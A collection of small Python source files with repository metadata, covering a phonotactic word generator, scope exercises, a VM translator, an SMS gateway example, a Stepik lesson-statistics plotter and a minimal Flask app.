"k",
"l",
"m",
"n",
"p",
"r",
"s",
"t",
"v",
"ŋ",
"lp",
"lb",
"lt",
"ld",
"ltʃ",
"ldʒ",
"lk",
"rp",
"rb",
"rt",
"rd",
"rtʃ",
"rdʒ",
"rk",
"rɡ",
"lf",
"lv",
"lθ",
"ls",
"lʃ",
"rf",
"rv",
"rθ",
"rs",
"rz",
"rʃ",
"lm",
"ln",
"rm",
"rn",
"rl",
"mp",
"nt",
"nd",
"ntʃ",
"ndʒ",
"ŋk",
"mf",
"mθ",
"nθ",
"ns",
"nz",
"ŋθ",
"ft",
"sp",
"st",
"sk",
"fθ",
"pt",
"kt",
"pθ",
"ps",
"tθ",
"ts",
"dθ",
"ks",
"lpt",
"lps",
"lfθ",
"lts",
"lst",
"lkt",
"lks",
"rmθ",
"rpt",
"rps",
"rts",
"rst",
"rkt",
"mpt",
"mps",
"ndθ",
"ŋkt",
"ŋks",
"ŋkθ",
"ksθ",
"kst",
]
def gen_syllable(prob_onset=0.6, prob_coda=0.8):
has_onset = random.random() < prob_onset
onset = random.choice(onsets) if has_onset else ""
has_coda = random.random() < prob_coda
coda = random.choice(codas) if has_coda else ""
nucleus = random.choice(nuclei)
print((onset, nucleus, coda))
return onset+nucleus+coda
def pick_probs(word_so_far, num_syllables):
# longer words get shorter syllables
# if the previous syllable of the word had no coda, this syllable must have an onset
# so we don't get a pile of adjacent vowel sounds
prob_onset = prob_coda = 1.2 / (1+num_syllables)
if word_so_far and word_so_far[-1] in ['a','e','i','o','u']:
prob_onset = 1.0
return (prob_onset, prob_coda)
def gen_word():
num_syllables = random.choice([1,1,1,1,2,2,3])
outword = ""
for _ in range(num_syllables):
(prob_onset, prob_coda) = pick_probs(outword, num_syllables)
outword += gen_syllable(prob_onset=prob_onset, prob_coda=prob_coda)
return outword
def main():
parser = argparse.ArgumentParser(description="Generate 'words' using english phonotactics")
parser.add_argument("-n","--num_words", default=5, help="Number of 'words' to generate")
args = parser.parse_args()
for _ in range(args.num_words):
print(gen_word())
if __name__ == "__main__":
main()
| 1,181 | 0 | 92 |
8db9f1005f6ba3b0c94e86e59866a00dacf65a7b | 525 | py | Python | 20-functions/scope.py | ehsankorhani/python-lessons | a1974cb2b43b73751fc4737e3e3aa830aa16a644 | [
"MIT"
] | null | null | null | 20-functions/scope.py | ehsankorhani/python-lessons | a1974cb2b43b73751fc4737e3e3aa830aa16a644 | [
"MIT"
] | null | null | null | 20-functions/scope.py | ehsankorhani/python-lessons | a1974cb2b43b73751fc4737e3e3aa830aa16a644 | [
"MIT"
] | null | null | null | # def f():
# print (x, id(x))
# x = 99
# print (x, id(x))
# f()
# # ----------------
# def f():
# x = 100
# print (x, id(x))
# f()
# # print (x)
# # ----------------
# def f():
# x = 100
# print (x, id(x))
# x = 99
# print (x, id(x))
# f()
# print (x, id(x))
# # ----------------
# def f():
# x = 100
# print (x, id(x))
# def y():
# print (x, id(x))
# y()
# f()
# # ----------------
x = 99
f()
print (x, id(x)) | 10.294118 | 26 | 0.300952 | # def f():
# print (x, id(x))
# x = 99
# print (x, id(x))
# f()
# # ----------------
# def f():
# x = 100
# print (x, id(x))
# f()
# # print (x)
# # ----------------
# def f():
# x = 100
# print (x, id(x))
# x = 99
# print (x, id(x))
# f()
# print (x, id(x))
# # ----------------
# def f():
# x = 100
# print (x, id(x))
# def y():
# print (x, id(x))
# y()
# f()
# # ----------------
x = 99
def f():
global x
x = 100
print (x, id(x))
f()
print (x, id(x)) | 33 | 0 | 23 |
4cdcaba19b94f24b30f90160f4d645dfc15fbb94 | 359 | py | Python | ex033guanabara.py | BrunosVieira88/Python | 7dc105a62ede0b33d25c5864e892637ca71f2beb | [
"MIT"
] | null | null | null | ex033guanabara.py | BrunosVieira88/Python | 7dc105a62ede0b33d25c5864e892637ca71f2beb | [
"MIT"
] | null | null | null | ex033guanabara.py | BrunosVieira88/Python | 7dc105a62ede0b33d25c5864e892637ca71f2beb | [
"MIT"
] | null | null | null | n1=int(input('digite um numero'))
n2=int(input('digite um numero'))
n3=int(input('digite um numero'))
maior = n1
if n2 > n1 and n2 > n3 :
maior = n2
if n3 > n1 and n3 >n2 :
maior = n3
menor = n1
if n2 < n1 and n2 < n3 :
menor = n2
if n3 < n1 and n3 < n2 :
menor = n3
print ('{} é o MAIOR'.format(maior))
print ('{} é o MENOR'.format(menor)) | 19.944444 | 36 | 0.590529 | n1=int(input('digite um numero'))
n2=int(input('digite um numero'))
n3=int(input('digite um numero'))
maior = n1
if n2 > n1 and n2 > n3 :
maior = n2
if n3 > n1 and n3 >n2 :
maior = n3
menor = n1
if n2 < n1 and n2 < n3 :
menor = n2
if n3 < n1 and n3 < n2 :
menor = n3
print ('{} é o MAIOR'.format(maior))
print ('{} é o MENOR'.format(menor)) | 0 | 0 | 0 |
1592d18a13e759416b2fd68ded0e59434dc5f0a7 | 2,645 | py | Python | VMTranslator.py | jamespolley/VM-Translator | 2d573f5234d956a5fe4d5b9c607b4e98e04b403e | [
"MIT"
] | 1 | 2022-02-21T13:56:28.000Z | 2022-02-21T13:56:28.000Z | VMTranslator.py | jamespolley/VM-Translator | 2d573f5234d956a5fe4d5b9c607b4e98e04b403e | [
"MIT"
] | null | null | null | VMTranslator.py | jamespolley/VM-Translator | 2d573f5234d956a5fe4d5b9c607b4e98e04b403e | [
"MIT"
] | null | null | null | # To Do: improve docstrings
from Parser import Parser
from CodeWriter import CodeWriter
import sys
import os
class VMTranslator:
"""
Main class. Handles input, reads the VM file, writes to the assembly file, and drives the VM translation process.
"""
@staticmethod
@staticmethod
@staticmethod
@staticmethod
@staticmethod
if __name__ == "__main__":
if len(sys.argv) < 2:
raise Exception() # To Do - elaborate
else:
input_files = sys.argv[1]
output_file = sys.argv[2]
vmt = VMTranslator(input_files, output_file) | 32.654321 | 117 | 0.612476 | # To Do: improve docstrings
from Parser import Parser
from CodeWriter import CodeWriter
import sys
import os
class VMTranslator:
"""
Main class. Handles input, reads the VM file, writes to the assembly file, and drives the VM translation process.
"""
def __init__(self, input, include_comments=True, include_init_code=True):
self.file_path = self.get_file_path(input)
self.input_files = self.process_input(input, self.file_path)
self.file_path = self.get_file_path(input)
self.output_file = self.get_output_file(self.file_path)
self.include_comments = include_comments
self.include_init_code = include_init_code
def translate(self):
code_writer = CodeWriter(None,
include_comments=self.include_comments)
if self.include_init_code:
code_writer.generate_init()
for f in self.input_files:
vm_code = self.read(f)
parser = Parser(vm_code)
code_writer.set_current_file_name(f.split("\\")[-1][:-3])
while parser.has_next():
parser.advance()
parsed_line = parser.parse_current_line()
if not parsed_line: continue
code_writer.generate_command(parsed_line)
code_writer.generate_end()
output_file_path = os.path.join(
self.file_path, self.output_file)
self.write(output_file_path, code_writer)
@staticmethod
def process_input(input, file_path):
input_files = []
if os.path.isfile(input):
input_files.append(input)
else:
for f in os.listdir(input):
if f.endswith(".vm"):
input_file = os.path.join(file_path, f)
input_files.append(input_file)
return input_files
@staticmethod
def get_file_path(input):
if os.path.isdir(input):
return input
else:
return os.path.dirname(input)
@staticmethod
def get_output_file(file_path):
return file_path.split("\\")[-1] + ".asm"
@staticmethod
def read(vm_file_path):
with open(vm_file_path) as f:
return f.readlines()
@staticmethod
def write(asm_file_path, asm_code):
with open(asm_file_path, "w") as f:
for line in asm_code:
f.write(line + "\n")
if __name__ == "__main__":
if len(sys.argv) < 2:
raise Exception() # To Do - elaborate
else:
input_files = sys.argv[1]
output_file = sys.argv[2]
vmt = VMTranslator(input_files, output_file) | 1,850 | 0 | 188 |
d4c9e01d80c78bb98917cb8816051aa01abb469d | 728 | py | Python | misc/doc/sources/apis/ja-http/example_send_misc.py | ibsindsrt/Jasmin-SMPP | 0645b892e5c6a2eb436bb15c019fffa5d13898c0 | [
"Apache-2.0"
] | null | null | null | misc/doc/sources/apis/ja-http/example_send_misc.py | ibsindsrt/Jasmin-SMPP | 0645b892e5c6a2eb436bb15c019fffa5d13898c0 | [
"Apache-2.0"
] | null | null | null | misc/doc/sources/apis/ja-http/example_send_misc.py | ibsindsrt/Jasmin-SMPP | 0645b892e5c6a2eb436bb15c019fffa5d13898c0 | [
"Apache-2.0"
] | null | null | null | # Python example
# http://jasminsms.com
import urllib2
import urllib
baseParams = {'username':'foo', 'password':'bar', 'to':'+336222172', 'content':'Hello'}
# Sending long content (more than 160 chars):
baseParams['content'] = 'Very long message ....................................................................................................................................................................................'
urllib2.urlopen("http://127.0.0.1:1401/send?%s" % urllib.urlencode(baseParams)).read()
# Sending UCS2 (UTF-16) arabic content
baseParams['content'] = '\x06\x23\x06\x31\x06\x46\x06\x28'
baseParams['coding'] = 8
urllib2.urlopen("http://127.0.0.1:1401/send?%s" % urllib.urlencode(baseParams)).read()
| 45.5 | 224 | 0.53022 | # Python example
# http://jasminsms.com
import urllib2
import urllib
baseParams = {'username':'foo', 'password':'bar', 'to':'+336222172', 'content':'Hello'}
# Sending long content (more than 160 chars):
baseParams['content'] = 'Very long message ....................................................................................................................................................................................'
urllib2.urlopen("http://127.0.0.1:1401/send?%s" % urllib.urlencode(baseParams)).read()
# Sending UCS2 (UTF-16) arabic content
baseParams['content'] = '\x06\x23\x06\x31\x06\x46\x06\x28'
baseParams['coding'] = 8
urllib2.urlopen("http://127.0.0.1:1401/send?%s" % urllib.urlencode(baseParams)).read()
| 0 | 0 | 0 |
db581a7f7fcb3566e2addad4b3945f995686c5f1 | 39 | py | Python | proj_template/__init__.py | masmangan/proj-template | 4d2b26cfc59d1df00d181c7a5073eb88fba48b36 | [
"MIT"
] | null | null | null | proj_template/__init__.py | masmangan/proj-template | 4d2b26cfc59d1df00d181c7a5073eb88fba48b36 | [
"MIT"
] | null | null | null | proj_template/__init__.py | masmangan/proj-template | 4d2b26cfc59d1df00d181c7a5073eb88fba48b36 | [
"MIT"
] | null | null | null | """Initialize proj-template module."""
| 19.5 | 38 | 0.717949 | """Initialize proj-template module."""
| 0 | 0 | 0 |
626d721b04010a74c03b4b5c03b52f130af3c1b2 | 602 | py | Python | src/pkgcheck/__init__.py | CyberTailor/pkgcheck | 7a20b0eb6aad70cf88e085632261a1830b50e568 | [
"BSD-3-Clause"
] | null | null | null | src/pkgcheck/__init__.py | CyberTailor/pkgcheck | 7a20b0eb6aad70cf88e085632261a1830b50e568 | [
"BSD-3-Clause"
] | null | null | null | src/pkgcheck/__init__.py | CyberTailor/pkgcheck | 7a20b0eb6aad70cf88e085632261a1830b50e568 | [
"BSD-3-Clause"
] | null | null | null | from importlib import import_module as _import
from .api import keywords, scan
from .base import PkgcheckException
from .results import Result
__all__ = ('keywords', 'scan', 'PkgcheckException', 'Result')
__title__ = 'pkgcheck'
__version__ = '0.10.10'
def __getattr__(name):
"""Provide import access to keyword classes."""
if name in keywords:
return keywords[name]
try:
return _import('.' + name, __name__)
except ImportError:
raise AttributeError(f'module {__name__} has no attribute {name}')
| 24.08 | 74 | 0.699336 | from importlib import import_module as _import
from .api import keywords, scan
from .base import PkgcheckException
from .results import Result
__all__ = ('keywords', 'scan', 'PkgcheckException', 'Result')
__title__ = 'pkgcheck'
__version__ = '0.10.10'
def __getattr__(name):
"""Provide import access to keyword classes."""
if name in keywords:
return keywords[name]
try:
return _import('.' + name, __name__)
except ImportError:
raise AttributeError(f'module {__name__} has no attribute {name}')
def __dir__():
return sorted(__all__ + tuple(keywords))
| 38 | 0 | 23 |
e94dfbcace5ad7158b789cb626816432909e8ed2 | 962 | py | Python | setup.py | deepomicslab/SuperTLD | 92e70c03cb59283d0c11e6b775fd90d1dee486b3 | [
"MIT"
] | null | null | null | setup.py | deepomicslab/SuperTLD | 92e70c03cb59283d0c11e6b775fd90d1dee486b3 | [
"MIT"
] | null | null | null | setup.py | deepomicslab/SuperTLD | 92e70c03cb59283d0c11e6b775fd90d1dee486b3 | [
"MIT"
] | null | null | null | # _*_ coding: utf-8 _*_
"""
Time: 2022/3/7 15:37
Author: ZHANG Yuwei
Version: V 0.2
File: setup.py
Describe:
"""
import setuptools
# Reads the content of your README.md into a variable to be used in the setup below
with open("./README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name='supertld',
version='0.0.2',
license='MIT',
description='SuperTLD: Detecting TAD-like domains from RNA-associated interactions',
long_description=long_description, # loads your README.md
long_description_content_type="text/markdown", # README.md is of type 'markdown'
author='Yu Wei Zhang',
author_email='ywzhang224@gmail.com',
url='https://github.com/deepomicslab/SuperTLD',
packages=setuptools.find_packages(),
classifiers=[ # https://pypi.org/classifiers
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
],
) | 31.032258 | 89 | 0.655925 | # _*_ coding: utf-8 _*_
"""
Time: 2022/3/7 15:37
Author: ZHANG Yuwei
Version: V 0.2
File: setup.py
Describe:
"""
import setuptools
# Reads the content of your README.md into a variable to be used in the setup below
with open("./README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name='supertld',
version='0.0.2',
license='MIT',
description='SuperTLD: Detecting TAD-like domains from RNA-associated interactions',
long_description=long_description, # loads your README.md
long_description_content_type="text/markdown", # README.md is of type 'markdown'
author='Yu Wei Zhang',
author_email='ywzhang224@gmail.com',
url='https://github.com/deepomicslab/SuperTLD',
packages=setuptools.find_packages(),
classifiers=[ # https://pypi.org/classifiers
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
],
) | 0 | 0 | 0 |
c8c4509d1f728af1884a6838160414be7ee31adb | 1,214 | py | Python | Server/view/stamp.py | getballaena/Get-Ballaena-Server | 7c04e31017f13608fab5a0b490d78f79336a2866 | [
"MIT"
] | null | null | null | Server/view/stamp.py | getballaena/Get-Ballaena-Server | 7c04e31017f13608fab5a0b490d78f79336a2866 | [
"MIT"
] | null | null | null | Server/view/stamp.py | getballaena/Get-Ballaena-Server | 7c04e31017f13608fab5a0b490d78f79336a2866 | [
"MIT"
] | null | null | null | from flask import jsonify, Response, request
from model import StampModel, CouponModel
from view import BaseResource
| 28.232558 | 77 | 0.571664 | from flask import jsonify, Response, request
from model import StampModel, CouponModel
from view import BaseResource
class StampMapView(BaseResource):
def get(self) -> Response:
user = self.get_current_user()
map_: list = []
stamps = StampModel.get_all_stamps()
for stamp in stamps:
map_.append({
'name': stamp.stamp_name,
'is_captured': user.is_captured_stamp(stamp=stamp),
'location': stamp.location,
'x': stamp.x,
'y': stamp.y,
})
return jsonify(map_)
class StampCaptureView(BaseResource):
def post(self) -> Response:
user = self.get_current_user()
stamp = StampModel.get_stamp_by_stamp_name(request.json['stampName'])
if stamp is None:
return Response('', 204)
if user.is_captured_stamp(stamp=stamp):
return Response('', 205)
user.capture_stamp(stamp=stamp)
if user.is_captured_all_stamps():
CouponModel.create(
coupon_name='스탬프 이벤트 쿠폰',
user=user,
)
return Response('', 201)
return Response('', 200)
| 982 | 28 | 100 |
8b52f16235fdae18bffdc8d777431fd113a3d532 | 9,471 | py | Python | examples/plot_lesson_stats.py | alekspog/Stepik-API | 9d164d9dc5360e726205456c84404659409805b9 | [
"MIT"
] | 36 | 2016-12-12T18:33:10.000Z | 2021-11-12T12:18:37.000Z | examples/plot_lesson_stats.py | alekspog/Stepik-API | 9d164d9dc5360e726205456c84404659409805b9 | [
"MIT"
] | 20 | 2016-08-25T12:16:02.000Z | 2020-09-29T08:38:08.000Z | examples/plot_lesson_stats.py | alekspog/Stepik-API | 9d164d9dc5360e726205456c84404659409805b9 | [
"MIT"
] | 15 | 2016-08-25T09:57:26.000Z | 2022-03-12T07:33:21.000Z | # Run with Python 3
import requests
import pandas as pd
import math
import copy
'''This example demonstrates how to get lessons data via Stepik-API and why it can be useful.'''
'''We download lessons' data one by one,
then we make plots to see how much the loss of the people depends on the lesson time '''
plots_message = '<br /><hr>Plots describe how quantity of people who viewed, ' \
'passed and left depends on lesson duration.'
enable_russian = '<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> \n</head>'
welcome_message = 'Hi! <br><br> Click on public lessons to check them out. ' \
'<br><hr> List of existing lessons with id from {} to {}: <br> '
setting_css_style = '<style> \nli { float:left; width: 49%; } \nbr { clear: left; } \n</style>'
start_lesson_id = 1
finish_lesson_id = 100
# 1. Get your keys at https://stepik.org/oauth2/applications/ (client type = confidential,
# authorization grant type = client credentials)
client_id = "..."
client_secret = "..."
# 2. Get a token
auth = requests.auth.HTTPBasicAuth(client_id, client_secret)
resp = requests.post('https://stepik.org/oauth2/token/',
data={'grant_type': 'client_credentials'},
auth=auth
)
token = resp.json()['access_token']
# Class for drawing plots in text
def introduce_lessons_in_html(start, finish, json_of_lessons, html_file='lessons.html'):
"""
:param start: first id of lesson downloaded via API
:param finish: last id of lesson downloaded via API
:param json_of_lessons: json file we made by concatenating API answers that gave one-lesson-answer
:param html_file: file we write to
"""
with open(html_file, 'w', encoding='utf-8') as f:
# enabling russian language and setting html style for two-columns lists
f.write(enable_russian + setting_css_style)
f.write('<big>{}</big><ol>\n'.format(welcome_message.format(start, finish)))
for lesson in json_of_lessons:
if lesson['is_public']:
url = '<a href="https://stepik.org/lesson/{}">{}</a>'.format(lesson['slug'], lesson["title"])
f.write('<li>{}</li>\n'.format(url))
else:
f.write('<li>{}</li> \n'.format(lesson['title']))
f.write('</ol>\n')
f.close()
# 3. Call API (https://stepik.org/api/docs/) using this token.
# Example:
def get_lessons_from_n_to_m(from_n, to_m, current_token):
"""
:param from_n: starting lesson id
:param to_m: finish lesson id
:param current_token: token given by API
:return: json object with all existing lessons with id from from_n to to_m
"""
api_url = 'https://stepik.org/api/lessons/'
json_of_n_lessons = []
for n in range(from_n, to_m + 1):
try:
current_answer = (requests.get(api_url + str(n),
headers={'Authorization': 'Bearer ' + current_token}).json())
# check if lesson exists
if not ("detail" in current_answer):
json_of_n_lessons.append(current_answer['lessons'][0])
except:
print("Failure on id {}".format(n))
return json_of_n_lessons
def nan_to_zero(*args):
"""
:param args: lists with possible float-nan values
:return: same list with all nans replaced by 0
"""
for current_list in args:
for i in range(len(current_list)):
if not math.isnan(current_list[i]):
current_list[i] = round(current_list[i])
else:
current_list[i] = 0
if __name__ == '__main__':
# downloading lessons using API
json_of_lessons_being_analyzed = get_lessons_from_n_to_m(start_lesson_id, finish_lesson_id, token)
# storing the result in pandas DataFrame
lessons_data_frame = pd.DataFrame(json_of_lessons_being_analyzed)
# extracting the data needed
passed = lessons_data_frame['passed_by'].values
time_to_complete = lessons_data_frame['time_to_complete'].values
viewed = lessons_data_frame['viewed_by'].values
left = viewed - passed
# replacing data-slices by lists of their values
time_to_complete = time_to_complete.tolist()
viewed = viewed.tolist()
passed = passed.tolist()
left = left.tolist()
# replacing nan-values with 0 and rounding values
nan_to_zero(time_to_complete, viewed, passed, left)
# creating new Figure to make plots
figure1 = Figure(save_file='lessons.html')
# adding bar diagrams to Figure f1
figure1.add_barplot(time_to_complete, viewed, "X -- time to complete | Y - quantity of people who viewed")
figure1.add_barplot(time_to_complete, passed, "X -- time to complete | Y - quantity of people who passed")
figure1.add_barplot(time_to_complete, left, "X -- time to complete | Y - quantity of people who left")
# creating html-file describing lessons
introduce_lessons_in_html(start_lesson_id, finish_lesson_id, json_of_lessons_being_analyzed, 'lessons.html')
# saving plots (file is linked with Figure object f1)
figure1.save_plots_to_html()
| 41.539474 | 112 | 0.616302 | # Run with Python 3
import requests
import pandas as pd
import math
import copy
'''This example demonstrates how to get lessons data via Stepik-API and why it can be useful.'''
'''We download lessons' data one by one,
then we make plots to see how much the loss of the people depends on the lesson time '''
plots_message = '<br /><hr>Plots describe how quantity of people who viewed, ' \
'passed and left depends on lesson duration.'
enable_russian = '<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> \n</head>'
welcome_message = 'Hi! <br><br> Click on public lessons to check them out. ' \
'<br><hr> List of existing lessons with id from {} to {}: <br> '
setting_css_style = '<style> \nli { float:left; width: 49%; } \nbr { clear: left; } \n</style>'
start_lesson_id = 1
finish_lesson_id = 100
# 1. Get your keys at https://stepik.org/oauth2/applications/ (client type = confidential,
# authorization grant type = client credentials)
client_id = "..."
client_secret = "..."
# 2. Get a token
auth = requests.auth.HTTPBasicAuth(client_id, client_secret)
resp = requests.post('https://stepik.org/oauth2/token/',
data={'grant_type': 'client_credentials'},
auth=auth
)
token = resp.json()['access_token']
# Class for drawing plots in text
class Figure:
def __init__(self, space_for_digits=10, rows=25, columns=120, bar_quantity_in_one_fifth_y=5,
underscore_quantity_in_one_fifth_x=20, divider_value=5, save_file='plot.html'):
"""
:param space_for_digits: constant to make spare space for OY values
:param rows: full quantity of bars (|) OY
:param columns: full quantity of underscores (_) OX
:param bar_quantity_in_one_fifth_y: how many bars (|) are in 1 of divider-value parts
:param underscore_quantity_in_one_fifth_x: how many underscores (_) are in 1 of divider-value
:param divider_value: how many parts axes are divided into
:param save_file: html file where we save result
"""
self.figure_matrix = [] # canvas
self.rows = rows
self.columns = columns
self.space_for_digits = space_for_digits
self.bar_quantity_y = bar_quantity_in_one_fifth_y
self.underscore_quantity_x = underscore_quantity_in_one_fifth_x
self.divider = divider_value
self.file = save_file
self.plot_matrix_list = []
# creating empty canvas
for r in range(self.rows): # rows
self.figure_matrix.append([]) # add empty
for c in range(self.columns + self.space_for_digits): # each column
self.figure_matrix[r].append(' ') # axes
# drawing axes
self.figure_matrix.append(['_'] * (self.columns + self.space_for_digits))
self.figure_matrix.append([' '] * (self.columns + self.space_for_digits))
for row in self.figure_matrix:
row[self.space_for_digits] = '|'
def add_barplot(self, x_axe, y_axe, name="Plot"):
"""
adds new bar matrix to plot_matrix_list
:param x_axe - list of values X to put on OX axe
:param y_axe: - list of values Y to put on OY axe
:param name - title of this plot
"""
if x_axe and y_axe:
# calculating canvas params of current plot
max_x = max(x_axe)
max_y = max(y_axe)
step_y = max_y // self.divider
step_x = max_x // self.divider
value_of_bar = step_y / self.bar_quantity_y
value_of_underscore = step_x / self.underscore_quantity_x
current_plot_matrix = copy.deepcopy(self.figure_matrix)
# drawing bars on figure_matrix canvas
for point in range(len(x_axe)):
current_x = x_axe[point]
current_y = y_axe[point]
if value_of_bar == 0:
y = max_y
else:
y = round((max_y - current_y) // value_of_bar)
if value_of_underscore == 0:
x = max_x
else:
x = round(self.space_for_digits + current_x // value_of_underscore)
for row_index in range(y, 26):
current_plot_matrix[row_index][x] = '*'
i = 0
# putting values on axe Y
while max_y >= 0:
for dig in range(len(str(max_y))):
current_plot_matrix[i][dig] = str(max_y)[dig]
i += self.bar_quantity_y
if max_y == step_y:
break
max_y -= step_y
# putting values on axe X
i = self.space_for_digits
x_value = 0
while max_x >= x_value:
for dig in range(len(str(x_value))):
current_plot_matrix[-1][i + dig] = str(x_value)[dig]
i += self.underscore_quantity_x
x_value += step_x
# storing current plot in Figure field of all plots
self.plot_matrix_list.append({"matrix": current_plot_matrix, "name": name})
# saving plots given to html file
def save_plots_to_html(self):
f = open(self.file, 'a', encoding='utf-8')
f.write('<big>{}</big>'.format(plots_message))
for i in self.plot_matrix_list:
f.write('<h2>{}</h2>\n<pre>'.format(i["name"]))
for row in i["matrix"]:
for symbol in row:
f.write(str(symbol))
f.write('\n')
f.write('\n\n')
f.write('</pre><br>')
def introduce_lessons_in_html(start, finish, json_of_lessons, html_file='lessons.html'):
"""
:param start: first id of lesson downloaded via API
:param finish: last id of lesson downloaded via API
:param json_of_lessons: json file we made by concatenating API answers that gave one-lesson-answer
:param html_file: file we write to
"""
with open(html_file, 'w', encoding='utf-8') as f:
# enabling russian language and setting html style for two-columns lists
f.write(enable_russian + setting_css_style)
f.write('<big>{}</big><ol>\n'.format(welcome_message.format(start, finish)))
for lesson in json_of_lessons:
if lesson['is_public']:
url = '<a href="https://stepik.org/lesson/{}">{}</a>'.format(lesson['slug'], lesson["title"])
f.write('<li>{}</li>\n'.format(url))
else:
f.write('<li>{}</li> \n'.format(lesson['title']))
f.write('</ol>\n')
f.close()
# 3. Call API (https://stepik.org/api/docs/) using this token.
# Example:
def get_lessons_from_n_to_m(from_n, to_m, current_token):
"""
:param from_n: starting lesson id
:param to_m: finish lesson id
:param current_token: token given by API
:return: json object with all existing lessons with id from from_n to to_m
"""
api_url = 'https://stepik.org/api/lessons/'
json_of_n_lessons = []
for n in range(from_n, to_m + 1):
try:
current_answer = (requests.get(api_url + str(n),
headers={'Authorization': 'Bearer ' + current_token}).json())
# check if lesson exists
if not ("detail" in current_answer):
json_of_n_lessons.append(current_answer['lessons'][0])
except:
print("Failure on id {}".format(n))
return json_of_n_lessons
def nan_to_zero(*args):
"""
:param args: lists with possible float-nan values
:return: same list with all nans replaced by 0
"""
for current_list in args:
for i in range(len(current_list)):
if not math.isnan(current_list[i]):
current_list[i] = round(current_list[i])
else:
current_list[i] = 0
if __name__ == '__main__':
# downloading lessons using API
json_of_lessons_being_analyzed = get_lessons_from_n_to_m(start_lesson_id, finish_lesson_id, token)
# storing the result in pandas DataFrame
lessons_data_frame = pd.DataFrame(json_of_lessons_being_analyzed)
# extracting the data needed
passed = lessons_data_frame['passed_by'].values
time_to_complete = lessons_data_frame['time_to_complete'].values
viewed = lessons_data_frame['viewed_by'].values
left = viewed - passed
# replacing data-slices by lists of their values
time_to_complete = time_to_complete.tolist()
viewed = viewed.tolist()
passed = passed.tolist()
left = left.tolist()
# replacing nan-values with 0 and rounding values
nan_to_zero(time_to_complete, viewed, passed, left)
# creating new Figure to make plots
figure1 = Figure(save_file='lessons.html')
# adding bar diagrams to Figure f1
figure1.add_barplot(time_to_complete, viewed, "X -- time to complete | Y - quantity of people who viewed")
figure1.add_barplot(time_to_complete, passed, "X -- time to complete | Y - quantity of people who passed")
figure1.add_barplot(time_to_complete, left, "X -- time to complete | Y - quantity of people who left")
# creating html-file describing lessons
introduce_lessons_in_html(start_lesson_id, finish_lesson_id, json_of_lessons_being_analyzed, 'lessons.html')
# saving plots (file is linked with Figure object f1)
figure1.save_plots_to_html()
| 418 | 3,869 | 22 |
64b8b7ccdefb932d196593bd583873ca52de4f50 | 224 | py | Python | tests/baidu/test.py | marvinren/aiautomation | 639f57f502104dd170dca24dd9ff15d80c031e21 | [
"MIT"
] | null | null | null | tests/baidu/test.py | marvinren/aiautomation | 639f57f502104dd170dca24dd9ff15d80c031e21 | [
"MIT"
] | null | null | null | tests/baidu/test.py | marvinren/aiautomation | 639f57f502104dd170dca24dd9ff15d80c031e21 | [
"MIT"
] | null | null | null | from aiautomation.testcase.test_plan import TestPlanRunner, PlanInfo
plan = PlanInfo('4', '自动化测试', None
, None, '119', '1000', '0', '0')
t = TestPlanRunner(plan=plan)
t.add_case("百度搜索", "一般百度搜索")
t.start()
| 24.888889 | 68 | 0.642857 | from aiautomation.testcase.test_plan import TestPlanRunner, PlanInfo
plan = PlanInfo('4', '自动化测试', None
, None, '119', '1000', '0', '0')
t = TestPlanRunner(plan=plan)
t.add_case("百度搜索", "一般百度搜索")
t.start()
| 0 | 0 | 0 |
091205b0b2a4178f6f58de4ee9bd51c852db51c0 | 163 | py | Python | tests/test_calculator_module.py | tomhosking/pkg-example | 6bc887ef8a0992e7cc65d17abe4a690fc0a9a4d7 | [
"MIT"
] | 10 | 2020-04-24T12:43:24.000Z | 2020-05-06T07:19:33.000Z | tests/test_calculator_module.py | tomhosking/pkg-example | 6bc887ef8a0992e7cc65d17abe4a690fc0a9a4d7 | [
"MIT"
] | null | null | null | tests/test_calculator_module.py | tomhosking/pkg-example | 6bc887ef8a0992e7cc65d17abe4a690fc0a9a4d7 | [
"MIT"
] | 1 | 2020-04-29T12:40:34.000Z | 2020-04-29T12:40:34.000Z | from pkg_example.calculator_module import Calculator
| 23.285714 | 52 | 0.699387 | from pkg_example.calculator_module import Calculator
def test_double():
calc = Calculator()
assert calc.double(3) == 6
assert calc.double(3.0) == 6.0
| 87 | 0 | 23 |
a23f8b83ff0dbbfcaab3ab31c45989f156182b9e | 1,220 | py | Python | server_plugin/hello.py | Elovir/server_plugin | a56850725f0fdc8b358893fb7d4b8d6c6f03fcdf | [
"MIT"
] | null | null | null | server_plugin/hello.py | Elovir/server_plugin | a56850725f0fdc8b358893fb7d4b8d6c6f03fcdf | [
"MIT"
] | null | null | null | server_plugin/hello.py | Elovir/server_plugin | a56850725f0fdc8b358893fb7d4b8d6c6f03fcdf | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, session, redirect, url_for, escape, request
import os
os.putenv('LANG', 'en_US.UTF-8')
os.putenv('LC_ALL', 'en_US.UTF-8')
app = Flask(__name__)
@app.route('/t')
# @app.route('/')
# def index():
# if 'username' in session:
# return 'Logged in as %s' % escape(session['username'])
# return 'You are not logged in'
@app.route('/plugin', methods=['GET', 'POST'])
# @app.route('/login', methods=['GET', 'POST'])
# def login():
# session['username'] = request.form['username']
# return redirect(url_for('index'))
# return '''
# <form method="post">
# <p><input type=text name=username>
# <p><input type=submit value=Login>
# </form>
# '''
# @app.route('/logout')
# def logout():
# # remove the username from the session if it's there
# session.pop('username', None)
# return redirect(url_for('index'))
if __name__ == "__main__":
app.run()
| 23.921569 | 68 | 0.592623 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, session, redirect, url_for, escape, request
import os
os.putenv('LANG', 'en_US.UTF-8')
os.putenv('LC_ALL', 'en_US.UTF-8')
app = Flask(__name__)
@app.route('/t')
def index():
if 'username' in session:
return 'Logged in as %s' % escape(session['username'])
return 'You are not logged in'
# @app.route('/')
# def index():
# if 'username' in session:
# return 'Logged in as %s' % escape(session['username'])
# return 'You are not logged in'
@app.route('/plugin', methods=['GET', 'POST'])
def test():
print("test")
print(request.form)
return "Received"
# @app.route('/login', methods=['GET', 'POST'])
# def login():
# session['username'] = request.form['username']
# return redirect(url_for('index'))
# return '''
# <form method="post">
# <p><input type=text name=username>
# <p><input type=submit value=Login>
# </form>
# '''
# @app.route('/logout')
# def logout():
